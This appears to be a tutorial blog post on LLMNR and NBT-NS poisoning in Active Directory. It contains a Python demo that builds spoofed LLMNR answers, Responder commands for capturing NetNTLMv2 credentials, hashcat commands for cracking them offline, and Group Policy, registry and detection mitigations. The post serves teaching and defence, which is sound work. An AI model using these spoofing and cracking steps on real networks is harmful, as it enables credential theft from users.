Exploring Common Active Directory Vulnerabilities and Exploits: Day 1 – LLMNR Poisoning

What is LLMNR?

LLMNR (Link-Local Multicast Name Resolution) is a name-resolution protocol that Windows hosts fall back to when DNS cannot resolve a name. Instead of asking a server, the host multicasts the query to every machine on the local link (UDP port 5355, group 224.0.0.252) and accepts the first answer it receives. LLMNR is the successor to NBT-NS (NetBIOS Name Service), an older broadcast protocol on UDP port 137 that is usually still enabled alongside it; both share the same weakness. LLMNR poisoning is the attack against that fallback behaviour, not the protocol itself.

Key Flaw

The critical flaw of LLMNR is that it has no way to verify who answers: any host on the link can reply to a query and claim to be the name being looked up. An attacker who answers first can then demand NTLM authentication from the victim, which hands over a NetNTLMv2 challenge-response (loosely called the “NTLMv2 hash”). That value is bound to the challenge in that one exchange, so it cannot be replayed like an NT hash, but it can be taken offline and cracked to recover the victim’s password.

How It Works (Summary)

Imagine a scenario where a victim machine attempts to access a shared folder at \\hackme but mistakenly types \\hackm. Since \\hackm does not exist in DNS, the victim’s machine falls back to LLMNR and multicasts a query to every host on the local subnet (and, with NBT-NS, broadcasts the same question), asking in effect, “Does anyone know how to connect to \\hackm?”

The attacker does not need a true man-in-the-middle position, only a foothold on the same subnet: any host there can answer the query, and LLMNR has no way to check who answered. The attacker replies first, claiming to be \\hackm, and the victim’s SMB client connects to the attacker and authenticates with NTLM, handing over its NetNTLMv2 challenge-response. Capture does not depend on the password at all; only the offline cracking step does, and that succeeds when the password is weak.
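As an added example (not part of the original post), here is the exchange in miniature: the victim’s LLMNR query as it goes out to the 224.0.0.252 group, the spoofed answer a poisoner sends back, and the defender-side canary check that turns the same logic around. The packet layout follows RFC 4795 (a DNS-style header and question section); the transaction IDs, the name hackm and the attacker address 10.10.14.5 are assumptions for the demo, and the code builds the bytes in memory rather than putting them on the wire.

```python
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # IPv4 multicast group and UDP port (RFC 4795)
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """DNS-style length-prefixed labels, terminated by a zero byte."""
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"


def decode_name(data: bytes, off: int):
    """Read labels at `off`; return (name, offset just past the terminator)."""
    labels = []
    while data[off] != 0:
        n = data[off]
        labels.append(data[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    return ".".join(labels), off + 1


def build_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    """The victim's side: what Windows multicasts when DNS has no answer for `name`."""
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)       # flags 0 (QR=0), QDCOUNT=1
    return header + encode_name(name) + struct.pack(">HH", qtype, QCLASS_IN)


def parse_query(pkt: bytes):
    """Return (txid, name, qtype) for a single-question LLMNR query, else None."""
    if len(pkt) < 12:
        return None
    txid, flags, qdcount = struct.unpack(">HHH", pkt[:6])
    if flags & 0x8000 or qdcount != 1:                          # QR=1 is a response, not a query
        return None
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack(">HH", pkt[off:off + 4])
    return (txid, name, qtype) if qclass == QCLASS_IN else None


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30):
    """The poisoner's side: echo the ID and question, add one A record pointing at the attacker."""
    parsed = parse_query(query)
    if parsed is None or parsed[2] != QTYPE_A:                  # only answer A lookups in this demo
        return None
    txid, name, _ = parsed
    header = struct.pack(">HHHHHH", txid, 0x8000, 1, 1, 0, 0)  # QR=1, 1 question, 1 answer
    question = encode_name(name) + struct.pack(">HH", QTYPE_A, QCLASS_IN)
    answer = (encode_name(name) + struct.pack(">HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
              + socket.inet_aton(attacker_ip))
    return header + question + answer


def parse_response(pkt: bytes):
    """Return (txid, name, ip) from a response carrying one A record, else None."""
    if len(pkt) < 12:
        return None
    txid, flags, qdcount, ancount = struct.unpack(">HHHH", pkt[:8])
    if not flags & 0x8000 or qdcount != 1 or ancount < 1:
        return None
    _, off = decode_name(pkt, 12)
    off += 4                                                    # skip the question's QTYPE/QCLASS
    name, off = decode_name(pkt, off)
    rtype, rclass, _ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
    if rtype != QTYPE_A or rclass != QCLASS_IN or rdlen != 4:
        return None
    return txid, name, socket.inet_ntoa(pkt[off + 10:off + 14])


def detect_poisoner(canary_query: bytes, response: bytes):
    """Defender's side: a canary name that no host owns must never be answered.
    An answer with the matching ID means someone is poisoning; return the address it advertised."""
    q, r = parse_query(canary_query), parse_response(response)
    if q is None or r is None or q[0] != r[0] or q[1].lower() != r[1].lower():
        return None
    return r[2]


if __name__ == "__main__":
    victim_query = build_query(0x1234, "hackm")                 # the mistyped share name from the text
    spoofed = build_poisoned_response(victim_query, "10.10.14.5")
    print(parse_response(spoofed))                              # (4660, 'hackm', '10.10.14.5')
    canary = build_query(0x4242, "xk7q-canary")                 # a name nobody legitimately owns
    print(detect_poisoner(canary, build_poisoned_response(canary, "10.10.14.5")))
```

To put this on the wire you would bind a UDP socket to port 5355, join the group with IP_ADD_MEMBERSHIP and hand each datagram to parse_query; the spoofed answer goes back unicast to the querier’s source address and port, which is exactly the shortcut that makes poisoning cheap. The canary check is the approach detection tools such as Respounder and Conveigh take: ask for a name no host owns and treat any answer as a poisoner.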

Practical Example of LLMNR Poisoning

Let’s demonstrate an LLMNR poisoning attack step by step.

1. Run Responder

Attackers use Responder, a popular tool that listens for LLMNR, NBT-NS and mDNS queries, answers them with its own address, and then collects the NTLM authentication the victim sends to it. Start it on the interface facing the victims:

sudo responder -I tun0 -dwP

-I selects the interface (tun0 here because the lab is reached over VPN; on a physical engagement it is usually the LAN adapter, e.g. eth0). The other flags (-d, -w, -P) turn on Responder’s extra rogue services such as the WPAD proxy, which pulls in browser traffic as well as file-share lookups; see responder -h for what each one does. Responder needs root because it binds privileged ports such as 445 and 137.

2. An Event Occurs

A common trigger is a user trying to open a file share that does not exist, for example a mistyped name. The victim’s machine falls through DNS to LLMNR/NBT-NS, Responder answers the lookup as though it owned the share, and the victim’s SMB client connects to the attacker and authenticates with NTLM.

Once the victim connects, Responder prints the NetNTLMv2 challenge-response on the console and also writes it to its logs directory, one line per capture, already in the format hashcat expects (USER::DOMAIN:serverchallenge:NTProofStr:blob).


3. Cracking Hashes

What you have captured is a NetNTLMv2 challenge-response, not an NT hash: it is bound to the server challenge in that exchange, so it cannot be passed the way an NT hash can, but it can be cracked offline with Hashcat.

First, confirm the hash mode for NetNTLMv2:

hashcat --help | grep NTLM

The list shows 1000 (NTLM), 5500 (NetNTLMv1) and 5600 (NetNTLMv2). Mode 1000 is for NT hashes dumped from the SAM or NTDS.dit and will not work on Responder output; use 5600:

hashcat -m 5600 hashes.txt wordlist.txt

If the password is in your wordlist (or within reach of a rule set), Hashcat recovers it; hashcat -m 5600 hashes.txt --show prints the cracked results from the potfile afterwards.

Mitigations

To protect against LLMNR and NBT-NS poisoning, disable both protocols wherever you can and verify that the change actually reached your hosts:

  1. Disable LLMNR:
    In Group Policy Editor, go to Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client, open “Turn OFF Multicast Name Resolution” and set it to Enabled (a domain GPO uses the same path). This writes EnableMulticast = 0 (DWORD) under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient, which is the value to audit on endpoints.
  2. Disable NBT-NS:
    Navigate to Network Connections > Network Adapter Properties > TCP/IPv4 > Advanced > WINS tab and select “Disable NetBIOS over TCP/IP.” This is a per-adapter setting (NetbiosOptions = 2 under HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_{adapter GUID}), so at scale push it with a startup script or through the DHCP scope rather than by hand. Note that mDNS is a third fallback on current Windows builds and Responder poisons it as well.
  3. Additional Mitigations

    If disabling LLMNR/NBT-NS is not feasible, consider implementing these mitigations:

    • Enforce Network Access Control (NAC), so an attacker cannot simply plug into the subnet and answer queries.
    • Require strong user passwords (e.g., greater than 14 characters with complexity). This does not stop the capture, but it makes the offline cracking step impractical.
    • Verify the result: Responder’s analyze mode (responder -I eth0 -A) listens for LLMNR/NBT-NS/mDNS queries without answering them, so any queries it still sees come from hosts the policy has not reached.
